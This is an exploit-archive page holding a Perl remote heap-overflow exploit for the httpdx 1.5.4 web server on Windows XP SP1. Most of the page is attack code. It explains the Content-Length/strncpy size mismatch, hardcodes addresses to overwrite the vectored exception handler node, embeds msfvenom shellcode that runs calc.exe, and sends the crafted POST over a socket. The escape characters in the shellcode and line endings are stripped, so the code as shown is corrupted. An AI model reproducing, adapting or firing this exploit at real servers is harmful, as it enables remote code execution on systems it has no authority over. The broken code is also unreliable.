httpdx <= 1.5.4 Remote Heap Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : httpdx <= 1.5.4 Remote Heap Overflow
# Published : 2012-07-29
# Author :
# Previous Title : Novell ZENworks Configuration Management Preboot Service 0x06 Buffer Overflow
# Next Title : Sitecom MD-25x Multiple Vulnerabilities Reverse Root Shell Exploit

#!/usr/bin/perl -w
#======================================================================
# Exploit Title: httpdx <= 1.5.4 Remote Heap Overflow 
# Date: 28 July 2012
# Exploit Author: st3n [at sign] funoverip [dot] net
# Vendor Homepage: http://httpdx.sourceforge.net
# Download link: http://sourceforge.net/projects/httpdx/files/httpdx/httpdx%201.5.4/httpdx1.5.4.zip/download
# Version: 1.5.4
# Tested on: WinXP SP1
#======================================================================
# Additional notes:
# -----------------
#
# - During a POST request, httpdx allocates memory with malloc(size+1),
#   where 'size' is actually the value of "Content-Length" HTTP header..
#   All post-data will then be copied into this area using strncpy(x,y,size2),
#   where 'size2' = "request length" - "header length" (and not Content-Length)
#
# - As httpdx use it own handler function upon crash, this exploit  overwrite 
#   the first _VECTORED_EXCEPTION_NODE structure with a pointer to our shellcode.
#
# - The exploit works very often, but not always. In both case, httpdx crash 
#   after the exploit.
#
# - WinXP SP1
#   0x77ED73B4 --> UnhandledExceptionFilter()
#======================================================================
use strict;
use IO::Socket::INET;


# target
my $host = "127.0.0.1";

# The [perl|php|py|..] page to call during the POST request.
# The page must exists and the extension must be defined in the directive 
# "http.handlers = {...}" in httpdx.conf
my $page = "/test.pl";


# Windows XP - SP1 - English
# ---------------------------
# ptr to the first _VECTORED_EXCEPTION_NODE structure  = 0x77fc3210 - 4
my $veh_node_addr = 0x77fc320c ; 

# pointer to out shellcode => 0x00227664 - 8 = 0x0022765c
my $sc_ptr = 0x0022765c;


# shellcode
# (msfvenom -p windows/exec -f perl CMD=calc.exe)
my $shellcode =
"xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52" .
"x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26" .
"x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0d" .
"x01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0" .
"x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8b" .
"x58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xff" .
"x31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7d" .
"xf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8b" .
"x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44" .
"x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8b" .
"x12xebx86x5dx6ax01x8dx85xb9x00x00x00x50x68" .
"x31x8bx6fx87xffxd5xbbxf0xb5xa2x56x68xa6x95" .
"xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbb" .
"x47x13x72x6fx6ax00x53xffxd5x63x61x6cx63x2e" .
"x65x78x65x00";


# flush after every write
$| = 1;

my $sock = IO::Socket::INET->new("$host:80");

print $sock "POST $page HTTP/1.0rn" . 
		"Content-Length: 1023rn" . 
		"Content-Type: textrn" . 
		"Host: $host" . "rn" .
		"rn" .
		# shellcode
		$shellcode .
		# nops
		"x90" x (1032-length($shellcode)) .
		# VEH addr
		pack('V', $veh_node_addr) .
		# ptr to shellcode
		pack('V', $sc_ptr) 
		;
# if any ...
while(<$sock>){
        print $_;
}
exit;